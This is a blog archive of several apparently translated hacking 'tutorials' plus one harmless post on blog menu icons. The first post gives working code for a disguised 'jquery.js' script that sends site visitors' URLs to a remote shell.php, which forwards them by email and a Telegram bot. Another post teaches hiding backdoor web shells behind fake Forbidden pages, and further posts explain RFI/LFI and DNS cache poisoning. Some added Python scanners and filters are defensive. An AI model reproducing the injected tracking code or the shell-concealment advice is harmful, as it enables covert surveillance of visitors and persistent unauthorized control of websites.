Articles by "Tutorial"


Okay, previously I explained the JavaScript keylogger; this time I'll give a tutorial on how to install it.


If you haven't seen it yet, you can read it here: Java Script Keylogger

Let's get straight to it. First we create the jquery file,
with this code:

// Read the URL of the page that referred the visitor here
var r = document.referrer;
if (r != "") {
    // Send the referrer to shell.php as the ref parameter
    var x = new XMLHttpRequest();
    x.open("GET", "https://labs.suicide-db.com/shell.php?ref=" + r, true);
    x.send(); // the original called xhttp.send(), a variable that was never defined
}

A short explanation:
https://labs.suicide-db.com/shell.php : this is your website that hosts the shell containing the keylogger.


Once done, save it with the .js extension. Then you can create this script tag:

<script type="text/javascript" src="https://labs.suicide-db.com/jquery.js"></script>

Put this script tag inside <head> </head>. Example:

<head><script type="text/javascript" src="https://labs.suicide-db.com/jquery.js"></script></head>

Once that's done, on to the next step: go back to the link https://labs.suicide-db.com/shell.php from the step above. Now we'll create this shell.php file.

First, open your website's file manager and create a file called shell.php (or any name; here I made shell.php). Then put in the following script:

<?php
@date_default_timezone_set('Asia/Jakarta');
error_reporting(0);
error_log(0);
if (isset($_GET['ref'])) {
    $url = $_GET['ref'];
    if (!empty($url)) {
        // Mail subject and headers for the log message
        $sb = "[SHELL][Xenzia Worm][" . date('D, d M Y H:i:s') . "]";
        $headers = "From: PROLOGGER <KeyLogger@xenzia.worm>\r\n";
        // Log body: a timestamp and the referring URL received in ?ref=
        $msg = "+------------------------------------------+\n"
             . "# SHELL LOG " . date('D,d m Y H:i:s') . "\n"
             . "+------------------------------------------+\n"
             . "# URL :: " . $url . "\n"
             . "+------------------------------------------+\n"
             . "# JavCode @ 2018 | Powered by : shutdown57\n"
             . "+------------------------------------------+\n";
        // Deliver the log by e-mail, to Telegram, and append it to a daily file
        @mail("postmaster@zaenalarifin.net", $sb, $msg, $headers);
        @file_get_contents('https://api.telegram.org/bot516764791:AAEEnO8F…/sendMessage…);
        $fp = fopen('sl/JavCode-' . date('dmY') . '.txt', 'a');
        fwrite($fp, $msg);
        fclose($fp);
    }
    exit;
} else {
    exit('?');
}

Okay, things to note:
@mail("postmaster@zaenalarifin.net", $sb, $msg, $headers); (the log from this shell will go to your e-mail address)

@file_get_contents('https://api.telegram.org/bot516764791:AAEEnO8F…/sendMessage…);

(the log from the shell will go to your Telegram messages)

Once done, save the file and the keylogger is ready.
Okay, easy, isn't it? That's all for now, hopefully it's useful.

If you still don't understand, you can contact me via the Contact Us menu.

(Zaenal Arifin)


Okay guys, meet me again, Zaenal the incomparably handsome; this time I'll share a trick so that your backdoor shell doesn't get caught by other people's dorking.


Okay, so here's the thing. The conclusion is very simple.


Basically, when people dork for shells they use a fairly relevant Google dork,


e.g.: inurl:/wp-content/plugins/name/shell.php


Yes, this /shell.php is what's fatal, because the site has meta tags, so the shell, and every file that has been put on the site, automatically gets indexed by Google


and automatically ends up in Google's cache.

Example:




So when we create the shell in a directory we made ourselves,


e.g. /Haxor, and upload a file index.php << index.php contains your shell's source code,


then when we open the directory it works without the .php extension, because


Most likely nobody else will notice it even if it's indexed by Google, because usually if your shell's name looks odd, that's what shell thieves pay attention to; they probably think it's a big opportunity to steal it.


And don't give the directory a name associated with Hacker or the like; you can give it the name of a default CMS directory, plugins or the like,


e.g.: /javascript - /css - /filemanager - /tinymce


and if someone else opens the /javascript directory they'll automatically assume it isn't a shell.


And most importantly, give the shell a background that looks like a Forbidden page so it's more convincing, because they may well think that directory was set to forbidden by the site's admin.


Maybe the forbidden-shell trick is already known, but those stupid kids are smart enough that when they see the file name they don't close it straight away,

and the shell's name is also what draws attention, because those clever stupid kids know there's no way an admin would create a file with a weird name, for example:


e.g.: /wp-content/plugins/sayang.php


Well, that's roughly the technique,

and don't forget:


Never use <title>Shell bekdor apalah</title>; just use the title Forbidden so other people believe it, because if your shell's title is


e.g.: <title>Mini Shell</title>


those kids will automatically find it more easily, because as soon as they read the shell's name their bad intentions are certain and they'll try to open the link that shows up, and the result is that your shell simply disappears.


Here is an example of a shell that got dorked and will certainly be clicked by others:




Hopefully useful


(Zaenal Arifin)
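From the defending side, the camouflage described above (PHP dropped into /javascript or /css, an index.php that presents a Forbidden title) is exactly what a webroot audit can look for. The scanner below is an added example and not part of the original post; the directory list, the regexes and the constructed sample tree are assumptions made here.

```python
import os
import re
import tempfile

# Static-asset / CMS helper directory names the post suggests as camouflage,
# where no server-side code is expected (assumed list).
STATIC_DIRS = {"javascript", "js", "css", "images", "fonts", "filemanager", "tinymce"}
# Functions a shell needs in order to run commands or evaluate code.
SINK_RE = re.compile(r"\b(eval|assert|system|exec|shell_exec|passthru|popen|proc_open)\s*\(", re.I)
# The fake "Forbidden" page the post recommends as a cover.
FORBIDDEN_RE = re.compile(r"<title>\s*(403\s*)?forbidden\s*</title>", re.I)

def scan_webroot(root):
    """Return sorted (relative_path, reasons) for PHP files worth a manual look."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml")):
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            reasons = []
            if set(rel.lower().split("/")[:-1]) & STATIC_DIRS:
                reasons.append("php in static-asset directory")
            with open(path, "r", errors="replace") as fh:
                body = fh.read()
            if FORBIDDEN_RE.search(body) and SINK_RE.search(body):
                reasons.append("fake Forbidden page with code-execution sink")
            if reasons:
                findings.append((rel, reasons))
    return sorted(findings)

def build_sample_webroot():
    """Constructed sample tree: a legitimate plugin file plus the cover tricks from the post."""
    root = tempfile.mkdtemp()
    files = {
        "wp-content/plugins/gallery/gallery.php": "<?php add_action('init', 'gallery_init');",
        "javascript/index.php": "<html><head><title>403 Forbidden</title></head>"
                                "<body><?php @eval($_POST['x']); ?></body></html>",
        "css/style.php": "<?php header('Content-Type: text/css'); readfile('style.css');",
    }
    for rel, body in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
    return root
```

The static-directory rule is a heuristic that also flags legitimate files such as a CSS-serving script, so treat its output as a review list rather than a verdict.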

Okay, back again with me; this time I'll give a tutorial on how to add menu icons to your blog's navigation.

So what's the benefit of using menu icons?
Yes, apart from making your blog page prettier, it can of course become an attraction in itself, and a satisfaction in itself.

Okay, let's go straight to the first step.

Materials you need to have ready:

  • CSS
  • A warm coffee
  • And of course an Internet connection
Okay, you can get the CSS here:

CSS 1 : Here
CSS 2 : Here

Okay, once that's done, go to your blog's Dashboard and open the menu Theme > Edit HTML

Then put the CSS link code from above below the meta tag.


Once done, click Save Theme.

Next, go to the menu Layout > Top Menu; it usually differs per theme, and here my menu is Top Menu (Navigation).



Okay, then we insert the icon class markup:

<i class="icon code"> (NamaMenuKamu) </i>

Example:


<i class="fa fa-home"> Home </i>

Once done, click Save

and look at your blog's navigation menu :p

So the look becomes, well, something else; quite easy and free without having to hire a developer whose services aren't exactly cheap, i.e. expensive haha :p

If you still don't quite get it, you can watch the video here:
Link: https://youtu.be/kV2nbRbz-ws



Enjoy getting back to your activities

(Zaenal Arifin)

Remote File Inclusion (RFI)



Hello Guys! In this article we will learn how to exploit an RFI vulnerability. I hope you have read my previous article on Local File Inclusion; if you haven't, please go and read that first.



Remote File Inclusion (RFI)

As the name states if the attacker can include a remote file to the victim web app, it is called a Remote File Inclusion Vulnerability (RFI). Take a look at this piece of code:






As you can see, the first line extracts the file parameter value from the HTTP request made by the user, while the second line uses this value to set the file name. If the input is not sanitized properly, it can be used to include a malicious file from a remote server. Here's a vulnerable JSP code,





Again, if the input is not sanitized properly it can be used to include a malicious file from a remote server. RFI is not a common vulnerability at all, but it is very dangerous when exploited. Now you must be wondering how to exploit this vulnerability. Hold on, I will demonstrate it with a real-life example. We have a URL here,





Let's break things down



  1. www.victim.com is the target website
  2. file.php is a webpage with the parameter view=
  3. For example if the user wants to view a document related to animals, the webpage file.php loads it via the view= parameter.

Take a close look at view=. If it were including local files like view=/files/animals.php we would have tested for Local File Inclusion. But as we can see it is including files from docs.example.com, which is a different website; it means it loads files from another website, which means it may include any malicious file too. Enough theory! So here's the vulnerable parameter


Now I will try to load an image by submitting its URL like this





See? How easy is that? With a webshell you can take over their website or even the whole server.

Also Read : File Inclusion Attack

Local File Inclusion (LFI) and Remote File Inclusion (RFI)




Today’s article is about Local File Inclusion (LFI) and Remote File Inclusion (RFI).
If you have basic knowledge of SQL injection you probably know how we can inject our SQL queries into a vulnerable parameter.
We take advantage of vulnerable parameters in LFI and RFI too.

In SQL injection, we interact with the SQL database using SQL queries to retrieve sensitive data from the database. But in LFI/RFI we ask the webpage to open something for us, it could be a file or a webpage (a webpage is a file too) from another website.
Enough theory! Now let's see what the heck LFI and RFI are.

Local File Inclusion (LFI)

Take a look at this URL:






The parameter in this case is view= and the value is /images/Haxor.jpg.
It means open.php is a webpage which loads different files (Haxor.jpg in this case) from the server. There can be many sensitive files on the server which can be accessed using open.php if the webpage is vulnerable to LFI.

You can open/execute any type of file (not folders) with LFI, which means you can read logs, configuration files and execute files if a webpage is vulnerable to Local File Inclusion. You can even hack into the server if the server admin is stupid enough to not configure things properly.


Remote File Inclusion (RFI)


What is the difference between Local File Inclusion and Remote File Inclusion?
Well, both vulnerabilities can be used to open things, but LFI is used to open files from the server where the website is hosted (locally) while RFI is used to open files from another server (remotely).
We can easily host a malicious file on our server and use the RFI vulnerability to run it on the victim website.

Take a look at this URL:




By looking at the above URL one would guess that the parameter page= is loading webpages.
It is opening the home page; similarly it may open other pages from the website. But if the webpage (get.php) is not programmed properly then a hacker can replace home with the webpage of his choice, like






If everything goes well then get.php will try to open backdoor.php which will compromise the server (or something else, depends on what’s in it). It makes RFI a deadly vulnerability.
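For the include() pattern discussed here and in the RFI article above, the standard fix is an allowlist of includable pages plus explicit rejection of anything that looks remote or traverses the filesystem. The resolver below is an added example and not code from the page or any framework; BASE_DIR and the ALLOWED_PAGES table are hypothetical, and the page's own parameter values (home, /images/Haxor.jpg, a docs.example.com URL) serve as the inputs.

```python
import os
from urllib.parse import urlsplit

# Assumed document root and allowlist for this example: the only values that
# get.php?page= / file.php?view= should ever map to (hypothetical).
BASE_DIR = os.path.abspath("/var/www/app")
ALLOWED_PAGES = {
    "home": "pages/home.php",
    "animals": "files/animals.php",
}

class IncludeRejected(ValueError):
    """Raised when a page=/view= value must never reach include()."""

def resolve_include(value):
    """Map a user-supplied page/view value to one allowlisted local file.

    Order matters: reject remote URLs and stream wrappers first (RFI), then
    absolute paths and traversal (LFI), then anything not in the allowlist.
    """
    if not value or "\x00" in value:
        raise IncludeRejected("empty or NUL-containing value")
    # http://, https://, ftp://, php://, data:// ... all carry a scheme; a
    # leading // is a scheme-relative URL and is treated the same way.
    if urlsplit(value).scheme or value.startswith("//"):
        raise IncludeRejected("remote or wrapper include: " + value)
    parts = value.replace("\\", "/").split("/")
    if value.startswith(("/", "\\")) or ".." in parts:
        raise IncludeRejected("absolute path or traversal: " + value)
    if value not in ALLOWED_PAGES:
        raise IncludeRejected("not an allowlisted page: " + value)
    path = os.path.normpath(os.path.join(BASE_DIR, ALLOWED_PAGES[value]))
    # Belt and braces: even an allowlisted entry must stay under BASE_DIR.
    if os.path.commonpath([BASE_DIR, path]) != BASE_DIR:
        raise IncludeRejected("resolved outside document root: " + path)
    return path

def is_safe_include(value):
    """Boolean form for log review: would this parameter value have been served?"""
    try:
        resolve_include(value)
        return True
    except IncludeRejected:
        return False
```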

Okay, a little introduction first: what is DNS poisoning?
DNS spoofing, commonly referred to as DNS cache poisoning, is a form of computer security hacking in which corrupt Domain Name System (DNS) data is inserted into the DNS resolver's cache, causing the name server to return an incorrect result record, e.g. an IP address. This results in traffic being diverted to the attacker's computer (or another computer).

Overview of the domain name system

A Domain Name System server translates human-readable domain names (such as suicide-db.com) into the numeric IP addresses used to route communication between nodes. Usually, if the server does not know the requested translation, it will ask another server, and the process continues recursively. To improve performance, the server will typically remember (cache) this translation for a certain period of time. This means that if it receives another request for the same translation, it can reply without needing to ask another server, until the cache expires.


When a DNS server receives a false translation and caches it for performance optimization, it is considered poisoned, and it supplies the false data to its clients. If a DNS server is poisoned, it may return an incorrect IP address, diverting traffic to another computer (often the attacker's).

Cache poisoning attacks

Normally, a networked computer uses a DNS server provided by an Internet service provider (ISP) or the computer user's organization. DNS servers are used in an organization's network to improve resolution response performance by caching previously obtained query results. Poisoning attacks on a single DNS server can affect the users serviced directly by the compromised server or those serviced indirectly by its downstream server(s) if applicable.

To perform a cache poisoning attack, the attacker exploits flaws in the DNS software. A server should correctly validate DNS responses to ensure that they are from an authoritative source (for example by using DNSSEC); otherwise the server might end up caching the incorrect entries locally and serve them to other users that make the same request.


This attack can be used to redirect users from a website to another site of the attacker's choosing. For example, an attacker spoofs the IP address DNS entries for a target website on a given DNS server and replaces them with the IP address of a server under their control. The attacker then creates files on the server under their control with names matching those on the target server. These files usually contain malicious content, such as computer worms or viruses. A user whose computer has referenced the poisoned DNS server gets tricked into accepting content coming from a non-authentic server and unknowingly downloads the malicious content. This technique can also be used for phishing attacks, where a fake version of a genuine website is created to gather personal details such as bank and credit/debit card details.

Variants

In the following variants, the entries for the server ns.suicide-db.com would be poisoned and redirected to the attacker's name server at IP address 127.0.0.1. These attacks assume that the name server for suicide-db.com is ns.suicide-db.com.

To accomplish the attacks, the attacker must force the target DNS server to make a request for a domain controlled by one of the attacker's nameservers.

Redirect the target domain's name server

The first variant of DNS cache poisoning involves redirecting the name server of the attacker's domain to the name server of the target domain, then assigning that name server an IP address specified by the attacker.


DNS server's request: what are the address records for subdomain.attacker.com?

















A vulnerable server would cache the additional A-record (IP address) for ns.target.example, allowing the attacker to resolve queries to the entire suicide-db.com domain.

Redirect the NS record to another target domain

The second variant of DNS cache poisoning involves redirecting the nameserver of another domain, unrelated to the original request, to an IP address specified by the attacker.


DNS server's request: what are the address records for subdomain.attacker.com?

















A vulnerable server would cache the unrelated authority information for target.example's NS-record (nameserver entry), allowing the attacker to resolve queries to the entire suicide-db.com domain.
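The validation the text calls for ("a server should correctly validate DNS responses") is, short of DNSSEC, the bailiwick rule: a server is only believed about names inside the zone it was asked about, and glue addresses only for hosts its own delegation names. The filter below is an added example rather than code from the page; the record tuples and the referral contents are constructed from the two variants above, with the attacker address 127.0.0.1 taken from the text.

```python
# Records are (owner_name, type, rdata) tuples, as seen in a referral's authority and additional sections.

def _labels(name):
    return name.lower().rstrip(".").split(".")

def in_bailiwick(record_name, zone_name):
    """True if record_name is zone_name itself or a name beneath it."""
    rec, zone = _labels(record_name), _labels(zone_name)
    return len(rec) >= len(zone) and rec[-len(zone):] == zone

def bailiwick_filter(delegated_zone, authority, additional):
    """Keep only the referral data the answering server may legitimately supply;
    delegated_zone is the zone being queried (attacker.com for subdomain.attacker.com).
    Returns (kept_authority, kept_additional, dropped)."""
    kept_auth, kept_add, dropped = [], [], []
    for rec in authority:
        name, rtype, _ = rec
        # Variant 2 from the text: an NS record for target.example handed out by
        # attacker.com's server is outside its bailiwick and must not be cached.
        if rtype == "NS" and in_bailiwick(name, delegated_zone):
            kept_auth.append(rec)
        else:
            dropped.append(rec)
    # Glue addresses are accepted only for hosts named by a kept NS record ...
    glue_hosts = {rdata.lower().rstrip(".") for _, _, rdata in kept_auth}
    for rec in additional:
        name, rtype, _ = rec
        # ... and only if that host itself lies inside the zone. Variant 1: the
        # A record claimed for ns.target.example is discarded even though an
        # in-zone NS record points at that host.
        if (rtype in ("A", "AAAA") and in_bailiwick(name, delegated_zone)
                and name.lower().rstrip(".") in glue_hosts):
            kept_add.append(rec)
        else:
            dropped.append(rec)
    return kept_auth, kept_add, dropped

# Constructed referral that bundles both variants described above; the
# attacker-controlled address is 127.0.0.1 as in the text.
SAMPLE_AUTHORITY = [
    ("attacker.com", "NS", "ns.attacker.com"),
    ("attacker.com", "NS", "ns.target.example"),
    ("target.example", "NS", "ns.attacker.com"),
]
SAMPLE_ADDITIONAL = [
    ("ns.attacker.com", "A", "127.0.0.1"),
    ("ns.target.example", "A", "127.0.0.1"),
]
```

Run it as bailiwick_filter("attacker.com", SAMPLE_AUTHORITY, SAMPLE_ADDITIONAL): the in-zone delegation and its glue survive, while the target.example NS record and the address claimed for ns.target.example are dropped.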

Zaenal Arifin
